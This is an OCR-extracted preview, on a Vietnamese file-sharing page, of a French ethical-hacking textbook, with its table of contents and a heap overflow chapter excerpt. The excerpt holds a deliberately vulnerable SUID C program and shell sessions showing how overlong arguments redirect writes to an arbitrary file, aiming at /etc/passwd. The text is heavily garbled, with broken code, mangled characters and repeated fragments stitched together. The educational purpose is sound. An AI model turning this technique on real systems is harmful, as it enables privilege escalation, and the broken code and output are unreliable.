Securite informatique ethical hacking (1)

359 54 0
Securite informatique   ethical hacking (1)

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Sécurité informatique Ethical Hacking Apprendre l'attaque pour mieux se défendre Toutes les marques citées ont été déposées par leur éditeur respectif La loi du 11 Mars 1957 n'autorisant aux termes des alinéas et de l'article 41, d'une part, que les "copies ou reproductions strictement réservées l'usage privé du copiste et non destinées une utilisation collective", et, d'autre part, que les analyses et les courtes citations dans un but d'exemple et d'illustration, "toute représentation ou reproduction intégrale, ou partielle, faite sans le consentement de l'auteur ou de ses ayants droit ou ayant cause, est illicite" (alinéa 1er de l'article 40) Cette représentation ou reproduction, par quelque procộdộ que ce soit, constituerait donc une contre-faỗon sanctionnộe par les articles 425 et suivants du Code Pénal Copyright - Editions ENI - Octobre 2009 ISBN: 978-2-7460-5105-8 Imprimé en France Editions ENI ZAC du Moulin Neuf Rue Benjamin Franklin 44800 St HERBLAIN Tél 02.51.80.15.15 Fax 02.51.80.15.16 e-mail : editions@ediENLcom http://www.editions-eni.com Auteurs: ACISSI Collection Expert IT dirigée par Joëlle MUSSET Table des matières - Chapitre Introduction et définition Présentation 1.1 L'information est partout 1.2 Conntre le système d'information pour le protéger 10 1.3 Identifier la menace 1 1.4 Instaurer de bonnes pratiques de sécurité 1.5 Auditer son système Une nouvelle éthique de travail La connaissance avant toute chose 1.1 Les hackers « black hats», les chapeaux noirs 15 1.2 Les hackers « white hats», les chapeaux blancs 15 2.1.3 Les hackers « grey hats», les chapeaux gris 16 1.4 Les « script kiddies» 1.5 Les hackers universitaires 18 2.2 Un rapport différent au travail 18 2.3 La coopération comme clé de réussite 20 2.4 Tous des hackers ! 2 Chapitre Méthodologie d'une attaque Préambule 25 Collecte des informations 26 Conntre sa cible 26 2.2 Google est notre ami 2.3 Les humains sont bavards 2.4 Ouelques commandes utiles 2.5 La prise d'empreinte par pile TCP/IP 30 2.6 Interroger les services lancés 3 Repérage de failles 36 Consulter les failles recensées 36 3.2 Éliminer les failles non fondées Sécurité informatique Apprendre "attaque pour mieux se défendre Intrusion dans le système 38 Ne pas laisser de traces 38 4.2 Extension des privilèges 39 4.3 Reprise de la collecte d'informations 40 Assurer son accès 41 Exploiter les relations des machines .4 5.2 Écouter le trafic 5.3 Faciliter son retour Exploitation Chapitre Social Engineering Concept 45 1 Généralités 45 1.2 L'être humain : la pièce fragile 46 Les ingrédients La motivation 2.2 Le profil de l'attaquant 48 2.3 Le profil de la cible 50 Anatomie d'une attaque 3.1 Les moyens utilisés 3.2 Les leviers psychologiques 54 3.2 Explications 3.2.2 L'absence de méfiance 55 3.2.3 La crédulité 3.2.4 L'ignorance 59 3.2.5 La confiance 3.2.6 L'altruisme 64 3.2 Le besoin d'aide 3.2.8 L'intimidation 66 3.3 Exemples d'attaques 68 Contre-mesures 72 La matrice des sensibilités 72 Table des matières - 4.2 Détecter les attaques 4.3 Bonnes pratiques 74 Chapitre Les failles physiques Généralités 77 Accès physique direct l'ordinateur 78 2.1 Accès un ordinateur éteint dont le bios est protégé 78 2.2 Accès un ordinateur éteint dont le bios n'est pas protégé 2.2.1 Utilisation de Offline NT Password & Registry Editor v080802 2.2.2 Dumper la base SAM avec Backtrack 2.2.3 Les différents types d'algorithmes de cryptage 2.2.4 Les hashes de type LM et NTLM 2.2.5 Utiliser John the Ripper pour trouver les mots de passe 94 2.2.6 Utilisation des tables rainbow 2.2 Générer ses tables rainbow 100 2.2.8 Utiliser OPHCRACK 103 2.2.9 Utilisation du logiciel Cain&Abel 106 2.3 Accès un ordinateur allumé en mode session utilisateur courant 1 2.3.1 Découvrir les mots de passe enregistrés dans Internet Explorer 1 2.3.2 Révéler les astérisques cachant un mot de passe 1 2.3.3 Faire sa récolte d'informations 14 2.3.4 La récolte d'informations automatisée 15 2.3.5 Les clés USB U3 18 2.3.6 Le logiciel Gonzor-SwitchBlade 20 2.3 Contre-mesures aux clés U3 piégées 24 2.3.8 Les dump mémoires 26 2.3.9 Les données en mémoire 28 2.3.10 Créer une clé bootable pour dumper la mémoire 30 2.3.1 Les keyloggers matériels et logiciels 35 2.3.1 Contre-mesures aux keyloggers 140 Sécurité informatique Apprendre l'attaque pour mieux se défendre 2.3.1 Les flux ADS 2.3.14 Contre-mesures aux flux ADS Conclusion Index des sites Web 145 149 15 15 Chapitre Les failles réseaux Généralités 155 Rappel sur les réseaux TCP/IP 155 2.1 Adressage IP 155 2.2 Client/Serveur 156 Outils pratiques 15 3.1 Des informations sur les sockets 15 3.2 Scanner de port TCP 158 3.3 Netcat 159 3.4 SSH 159 3.5 Tunnel SSH 160 DoS et DDoS 160 Sniffing 16 5.1 Capturer des données avec Wireshark 16 16 5.2 Les filtres Man In The Middle (MITM) 165 6.1 Théorie 165 6.2 Pratique 166 6.2.1 Les plug-ins 172 6.2.2 Création d'un filtre 6.3 Contre-mesure 76 76 Failles Wi-Fi 7.1 Cracker un réseau WEP 7 7.2 Cracker le WPA 180 Ip over DNS 18 8.1 Principe 18 8.2 En pratique 181 Table des matières - 8.3 Contre-mesure 18 Conclusion 18 Chapitre Les failles Web Rappels sur les technologies du Web 185 1.1 Préambule 185 1.2 Le réseau Internet 185 1.3 Un site Web c'est quoi? 186 1.4 Consultation d'une page Web, anatomie des échanges client/serveur 186 1.5 Comment sont réalisées les pages Web? 190 Généralités sur la sécurité des sites Web 19 Petite analyse d'un site Web 19 3.1 Cartographie des parties visiblesdonnées ecce , Controle de données , Controle de données Nous allons utiliser le programme suivant pour démontrer notre Heap overflow : # i n c l u de < s t d i o h > # i n c l ude < s t d l i b h > # i n c l u de < s t r i n g h > i n t main ( i n t a r g c , char * a r gv [ ] ) ( F I LE * f d ; c h a r * e n t re u t i l i s a t e u r=ma l l oc ( ) ; char * s o r t i e f i ch i e r = ma l l oc ( ) ; p r i n t f ( " =========== =========== ============ = = == ====== ===== === \ n " ) ; print f ( " heap ove r f l ow - Ac i s s i - E N I e d i t i o n s \ n " ) ; p r i n t f ( " ======== = = = ============================== ====== ===== \ n \ n " ) i f ( a rgc ( 2) p r i n t f ( " U s a g e : % s < l a c h a i n e va e t r e e c r i t e dan s / tmp / e n i > \ n " , a r gv [ O ] ) ; exit ( ) ; } s t rcpy ( s o r t i e f i c h i e r , " / tmp / e n i " ) ; s t rcpy ( e n t r e u t i l i s a t e u r , a r gv [ l ] ) ; p r i n t f ( " E c r i t u r e d e \ " % s \ " a l a f i n de % s \ n " , e n t re u t i l i s a t e u r , s o rt i e f i c h i e r ) ; fd = fopen ( s o r t i e f i c h i e r , " a " ) ; i f ( f d == NULL ) ( fprin t f ( s td e r r , " impo s s ib l e d ' ouvr i r % s \ n " , s o r t i e f i c h i e r ) ; exit ( ) ; } 31 314 Séc u rité i nformatiq u e Apprendre l'attaque pour mieux se défe ndre fp r i n t f ( fd , " % s \ n " , e n t r eu t i l i s a t e u r ) ; f c l o s e ( fd ) ; return ; } Après avoir compilé le programme et donné les droits d'exécution avec le bit S UID actif, nous obtenons pour une utilisation normale l'écriture de la chne de caractères passée en argument dans /tmp/eni �adok : /home/fasm/l iv resjENI_HACK ING/p rog rammes# je c r ir e h e a p o ve r flow - Acissi - E N I editions ==================================================== �sage : /ecrire jkaddk : /home/ fasmjliv res/ ENI_HACKING/programmes# /ecrire " ethical hacking " =========================== == == ==================== heap over flo� - Acissi - ENI editions Ec r itu r e d e "e thical hacking ' a l a f i n de / tmp/eni li"adok : /home/fa sm/Uv reSjENI_HACK ING/prog rammes# mor e /tmp/eni ethical hacking �adok : /home/fasm/l ivres/ENI HACKINGjprogrammes# Oue pouvons-nous tenter pour exploiter une faille de type heap overflow ? Les failles applicatives Chapitre - Commenỗons par envoyer en argument, par exemple, un nombre de chif­ fres croissant kadok : /homelfasm/livres/ENI_HACKING/programmes# /ecrire 6123456789 heap overflow - Acissi - ENI editions = =================================== == = =========== Ecriture de '61 23456789 " a la fin de Itmp/eni kadok : /home/fasm/liv res/ENI_HACKING/p rogrammes# /ec r ir e 61234567890123456789 heap overflow - Acissi - ENI editions ======================= ============================ Ecriture de "01 234567890123456789' a la fin de /tmp/eni kadok : /home/fasm;livres/EN I_HACKING/programmes# ;ecrire 012345678901234567890123456789 heap o v e rflow - Acissi - ENI editions Ec riture d e '01 23'15678901 234567890123456789" a la fin de 456789 s1 kadok : /home/fasm/liv r e s/ENI_HACKING;p rogrammes# /ec: rire 01234567890123456789012345678 Nous voyons que pour le troisième essai, nous avons un changement dans le fichier d'écriture : E c r i ture de " 9 " a la f i n de Nous pouvons dộduire que si nous remplaỗons les derniers chiffres (456789) par le chemin d'un fichier, nous allons écrire l'intérieur Il faut 24 caractères devant le chemin du fichier kadok : Ihome/fasm/1ivre;;/B�I-'iACKItI!G/ programmes# /ecrire 012345678901234567890123/tmp/fichier_test heap over flow - Acissi - ENI editio ns Ecriture de '012345678901 234567890123/tmp/fichier_tes t ' a la fin de Itmp/fichier_test kadok : Ihome/fasm/Uvres/�IJIACKING/programmesll more Itmp/fichier_test 01234567890l2345678901 23/tllP/f ichie r _test kadok : Ihome/fasm/UvresjBHJIACKIII!G/programmes# Nous allons essayer d'écrire dans /etc/passwd, ce qui est théoriquement impossible pour un utilisateur normal 31 ... fasmjliv res/ ENI _HACKING/ programmes# /ecrire " ethical hacking " =========================== == == ==================== heap over flo� - Acissi - ENI editions Ec r itu r e d e "e thical hacking ' a...Sécurité informatique Ethical Hacking Apprendre l'attaque pour mieux se défendre Toutes les marques citées ont été... li"adok : /home/fa sm/Uv reSjENI_HACK ING/prog rammes# mor e /tmp/eni ethical hacking �adok : /home/fasm/l ivres/ENI HACKINGjprogrammes# Oue pouvons-nous tenter pour exploiter une faille de

Ngày đăng: 18/10/2019, 16:19

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan